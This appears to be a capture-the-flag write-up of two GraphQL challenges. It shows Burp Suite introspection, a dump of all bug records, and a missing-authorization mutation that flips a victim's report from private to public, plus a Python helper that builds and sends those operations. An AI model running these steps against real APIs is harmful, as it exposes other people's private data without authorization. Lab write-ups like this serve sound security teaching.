Before all
Both challenges are about GraphQL, and I solved them with the GraphQL support that Burp Suite provides.
Reference (PortSwigger): https://portswigger.net/web-security/graphql
BugDB v1
introspection
Introspection is a query against the special __schema and __type fields that returns the whole schema: every type, every query and mutation field, and their arguments. It is the first step of schema discovery.
Send any request to the GraphQL endpoint, then right-click it in the Proxy HTTP history (in Burp Suite) and send it to Repeater.
In the request pane, switch to the GraphQL view and choose "Set introspection query", then send it.
Next, right-click the introspection response and save the generated GraphQL queries to the site map; every query the API exposes now shows up under the target.
Finally, I picked a query, sent it to Repeater, removed all the variable parameters, and dumped all of the "allBugs" data.
BugDB v2
introspection
Same as above, but this time a mutation is also available in the schema.
And if I query "allBugs" directly the way I did before, there is only the admin's report, not the victim's.
mutation
A mutation is an operation used for making changes to data (GraphQL's write path), as opposed to a query, which only reads.
Furthermore, the extracted data contains a "private" field on each bug, which is what hides the victim's report from "allBugs".
So, to solve this challenge, just set the "private" value of the bug with id=2 to false through the mutation, then read it back with "allBugs". The mutation can be called without any authorization check, which is the actual bug here.
P.S. Just remember: DO NOT change the text value, LOL.
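The same workflow outside Burp, as an added example (not code from the writeup or from the challenge): parse an introspection result to enumerate the query and mutation fields with their argument types, then build the "allBugs" query and the "modifyBug" mutation from the schema instead of writing them by hand. The introspection response is constructed inline and the type/field names (Bug, modifyBug, ModifyBugPayload, User) are assumptions modelled on the shape of a real __schema result, not the challenge's actual schema.

```python
"""Enumerate operations from a GraphQL introspection result and build documents from it."""
import json
import urllib.request

INTROSPECTION_QUERY = """
query IntrospectionQuery { __schema {
  queryType { name } mutationType { name }
  types { name kind fields { name args { name type { ...TypeRef } } type { ...TypeRef } } } } }
fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name } } } }
"""

# --- Constructed sample introspection response (assumed schema, for illustration only) ---
def _named(kind, name): return {"kind": kind, "name": name, "ofType": None}
def _non_null(t): return {"kind": "NON_NULL", "name": None, "ofType": t}
def _list(t): return {"kind": "LIST", "name": None, "ofType": t}
INT, STR, BOOL = _named("SCALAR", "Int"), _named("SCALAR", "String"), _named("SCALAR", "Boolean")
BUG, USER, PAYLOAD = _named("OBJECT", "Bug"), _named("OBJECT", "User"), _named("OBJECT", "ModifyBugPayload")

SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "allBugs", "args": [], "type": _list(BUG)},
            {"name": "bug", "args": [{"name": "id", "type": _non_null(INT)}], "type": BUG}]},
        {"name": "Mutation", "kind": "OBJECT", "fields": [
            {"name": "modifyBug", "type": PAYLOAD, "args": [
                {"name": "id", "type": _non_null(INT)}, {"name": "private", "type": BOOL},
                {"name": "text", "type": STR}]}]},
        {"name": "Bug", "kind": "OBJECT", "fields": [
            {"name": "id", "args": [], "type": _non_null(INT)}, {"name": "text", "args": [], "type": STR},
            {"name": "private", "args": [], "type": BOOL}, {"name": "reporter", "args": [], "type": USER}]},
        {"name": "ModifyBugPayload", "kind": "OBJECT", "fields": [{"name": "ok", "args": [], "type": BOOL}]},
        {"name": "User", "kind": "OBJECT", "fields": [{"name": "username", "args": [], "type": STR}]},
        {"name": "Int", "kind": "SCALAR", "fields": None}, {"name": "String", "kind": "SCALAR", "fields": None},
        {"name": "Boolean", "kind": "SCALAR", "fields": None}]}}}


def unwrap(t):
    """Peel NON_NULL / LIST wrappers off a __Type reference and return the named type."""
    while t.get("ofType"):
        t = t["ofType"]
    return t


def render_type(t):
    """Render a __Type reference the way SDL prints it, e.g. [Bug] or Int!."""
    if t["kind"] == "NON_NULL":
        return render_type(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + render_type(t["ofType"]) + "]"
    return t["name"]


def list_operations(introspection):
    """Map 'query'/'mutation' to [(field, [(arg, type)], return type)], the site-map view in code."""
    schema = introspection["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    ops = {}
    for role in ("queryType", "mutationType"):
        root = schema.get(role)
        if not root:  # schemas without mutations report mutationType: null
            continue
        ops[role.replace("Type", "")] = [
            (f["name"], [(a["name"], render_type(a["type"])) for a in f["args"]], render_type(f["type"]))
            for f in types[root["name"]]["fields"] or []]
    return ops


def scalar_fields(types, type_name):
    """Scalar/enum fields of an object type: the leaf selection set for a dumped query."""
    return [f["name"] for f in types[type_name].get("fields") or []
            if unwrap(f["type"])["kind"] in ("SCALAR", "ENUM")]


def gql_literal(v):
    """Render a Python value as a GraphQL literal (bool before int: True is an int in Python)."""
    if isinstance(v, bool):
        return "true" if v else "false"
    if isinstance(v, (int, float)):
        return str(v)
    return json.dumps(str(v))  # GraphQL string literals use JSON-style quoting/escaping


def build_operation(introspection, op, field, **args):
    """Build an inline document, e.g. query { allBugs { id text private } } or
    mutation { modifyBug(id: 2, private: false) { ok } }, validating args against the schema."""
    schema = introspection["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    root = schema["queryType" if op == "query" else "mutationType"]["name"]
    fdef = next(f for f in types[root]["fields"] if f["name"] == field)
    unknown = set(args) - {a["name"] for a in fdef["args"]}
    if unknown:
        raise ValueError(f"{field} has no argument(s) {sorted(unknown)}")
    arg_text = "(" + ", ".join(f"{k}: {gql_literal(v)}" for k, v in args.items()) + ")" if args else ""
    ret = unwrap(fdef["type"])
    selection = " { " + " ".join(scalar_fields(types, ret["name"])) + " }" if ret["kind"] == "OBJECT" else ""
    return f"{op} {{ {field}{arg_text}{selection} }}"


def post_graphql(url, document, variables=None, headers=None):
    """POST a document as JSON, the same body shape Burp's GraphQL view sends (needs network)."""
    body = json.dumps({"query": document, "variables": variables or {}}).encode()
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": "application/json", **(headers or {})})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


if __name__ == "__main__":
    for kind, fields in list_operations(SAMPLE_INTROSPECTION).items():
        for name, args, ret in fields:
            print(f"{kind}: {name}({', '.join(f'{a}: {t}' for a, t in args)}) -> {ret}")
    print(build_operation(SAMPLE_INTROSPECTION, "query", "allBugs"))
    print(build_operation(SAMPLE_INTROSPECTION, "mutation", "modifyBug", id=2, private=False))
```

Against a live target you would first `post_graphql(url, INTROSPECTION_QUERY)` to obtain the real schema, feed that result to `list_operations` and `build_operation`, and only then send the generated mutation; note that the mutation is built with `private=False` and leaves the `text` argument out entirely, so the stored text is never touched.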